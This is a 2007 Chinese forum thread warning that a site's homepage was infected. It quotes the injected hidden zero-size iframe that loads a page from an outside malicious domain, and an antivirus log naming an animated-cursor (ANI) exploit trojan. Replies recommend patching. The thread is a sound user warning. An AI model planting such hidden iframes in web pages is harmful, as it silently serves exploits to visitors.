返回列表 发帖
Aka

Rank: 1

UID
416597 
帖子
75 
精华
威望
0  
阅读权限
100 
注册时间
2007-3-26 
1# 跳转到 » 倒序看帖
打印
tT
发表于 2007-6-24 18:12 | 只看该作者

[历史] 注意!小站主页确实有毒【已清除】

查看源代码,可以看到这么一行代码:
  1. <iframe src=http://WWW.86DX.NET/bb.htm  width=0 height=0></iframe>
复制代码


初步估计是ARP欺骗挂马。
请不要点击上面的链接。

NOD32 以及 McAfee 反病毒软件报告存在病毒。

请大家注意。

希望小站站长或相关管理人员联系你们的机房处理。查找感染ARP欺骗蠕虫的机器。

@22:00:00
已清除了。

[ 本帖最后由 Aka 于 2007-6-24 22:10 编辑 ]
收藏 分享

Aka

Rank: 1

UID
416597 
帖子
75 
精华
威望
0  
阅读权限
100 
注册时间
2007-3-26 
2#
发表于 2007-6-24 18:19 | 只看该作者

进一步分析

属于光标漏洞木马

2007-6-24        18:09:39        已删除         ZXAFFDASDADQ\Administrator        flashget.exe        G:\Downloads\9.js.jc!        Exploit-ANIfile.c (特洛伊)

TOP

RMSA

UID
14844 
帖子
4482 
精华
威望
1  
阅读权限
性别
男 
来自
雅露神教/YY乱世联盟 
注册时间
2003-11-22 
3#
发表于 2007-6-24 18:25 | 只看该作者
提示: 作者被禁止或删除 内容自动屏蔽

TOP

Aka

Rank: 1

UID
416597 
帖子
75 
精华
威望
0  
阅读权限
100 
注册时间
2007-3-26 
4#
发表于 2007-6-24 18:29 | 只看该作者
只要你安装了微软的光标漏洞补丁,就不用担心。

如果你的机器没有安装补丁,快到微软的主页上下载补丁安装吧。

TOP

OTL

Rank: 1

UID
344682 
帖子
9976 
精华
威望
5  
阅读权限
100 
注册时间
2006-3-27 
5#
发表于 2007-6-24 18:42 | 只看该作者
http://bbs.rohome.net/viewthread ... ghlight=%2Bdarkmomo

恶意连接



恩,正经说一句,是大可摸摸提供的补丁连接
似乎CISSP距离我很远,却非遥不可及....

关键,从今天,而不是明天,开始,努力

洗澡去了~

TOP

darkmomo

Rank: 1

UID
1960 
帖子
10528 
精华
威望
33  
阅读权限
100 
注册时间
1970-1-1 

赞助商
6#
发表于 2007-6-24 18:55 | 只看该作者
呃。。。那之后似乎还出现过几次变种ANI病毒。


还是用专业的杀毒软件看看吧。
The wheel of fortune.Starting over on a foreign land.

TOP

eeveekwok

Rank: 1

UID
420522 
帖子
205 
精华
威望
0  
阅读权限
100 
注册时间
2007-4-18 
7#
发表于 2007-6-24 19:11 | 只看该作者
论坛没有吧……

TOP

返回列表